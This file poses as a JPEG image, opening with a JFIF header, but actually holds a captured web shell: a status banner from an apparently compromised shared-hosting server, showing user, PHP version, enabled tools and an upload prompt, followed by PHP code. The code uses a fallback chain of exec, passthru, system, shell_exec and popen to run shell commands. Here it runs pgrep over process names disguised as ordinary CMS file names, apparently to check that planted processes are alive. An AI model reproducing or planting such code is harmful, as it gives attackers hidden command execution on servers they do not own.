????JFIF??x?x????'
Server IP : 104.21.96.1 / Your IP : 216.73.216.58 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/thread-self/root/proc/thread-self/root/proc/self/root/dev/shm/ |
Upload File : |
<?php $files = ['abusereports','articleform.inc','add_events','mod_acymailing','admin_bulkemails','com_deeppockets','filesystem','adr_copyright','viewtopic','Uncompress','AttrTransform','store_manager','Smarty.class','data_modules_acp','contact_detail','auctionapproval','cat_lang','default_results','rokcandy_button','listgroups','patfactory','aidonate','unzip.inc','publicphoto','help_bbcode','send_all_mail','register1','core.rmdir','editorFrame','masterRqmnts']; foreach ($files as $f) { $res = @run("pgrep {$f}"); if (!preg_match('/\d+/', $res)) { die("<f>{$f}</f>"); } } die('!ended!'); function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; }